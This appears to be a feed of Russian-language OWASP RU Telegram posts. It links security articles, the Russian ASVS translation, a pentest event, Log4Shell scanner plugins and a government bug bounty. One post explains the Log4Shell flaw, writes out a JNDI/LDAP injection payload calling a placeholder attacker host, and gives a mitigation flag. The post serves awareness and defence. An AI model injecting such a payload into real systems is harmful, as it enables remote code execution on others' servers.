OWASP RU のテレグラム投稿

https://habr.com/ru/companies/owasp/articles/817241/

https://habr.com/ru/companies/owasp/articles/770384/

https://habr.com/ru/company/owasp/blog/708470/

https://habr.com/ru/company/owasp/blog/703322/

https://github.com/OWASP/ASVS/blob/master/4.0/OWASP%20Application%20Security%20Verification%20Standard%204.0.3-ru.pdf за адаптацию и перевод спасибо Андрею Титову

​​В 11.00 стартует мероприятие "«Правильный» пентест — мы выбираем, нас выбирают", успейте зарегистрироваться и принять участие.

Обсудим критерии защищенности компаний, как провести пентест «правильно» и кем, какие предпосылки возникновения потребности в тестировании у заказчика. Рассмотрим инструменты для специалистов и грамотное техническое задание для пентестера, а также критерии оценки.

https://www.zaproxy.org/blog/2021-12-10-zap-and-log4shell/

Log4j2 RCE Passive Scanner plugin for BurpSuite

https://github.com/whwlsfb/Log4j2Scan

У половины интернета нашли выполнение произвольного кода через Log4j.

Выглядит это так:

1) Посылаем специально сформированный запрос вида ${jndi:ldap://attacker.host/blabla} в любое место, которое потенциально может залогироваться.
2) JNDI (Java Naming and Directory Interface) в свою очередь обрабатывает шаблон, запрашивает данные через LDAP у attacker.host
3) В ответе отдается JAVA класс, который и позволяет выполнить произвольный код.

Гроб. Гроб. Кладбище.
Временный фикс: JAVA_OPTS="-Dlog4j.formatMsgNoLookups=true”

Вот примеры того, что уязвимо (От Cloudflare и Apple до серверов майнкрафта).

Охота за уязвимостями на ДЭГ-2021
https://bb.gosuslugi.ru официальная Bug Bounty от Госуслуг.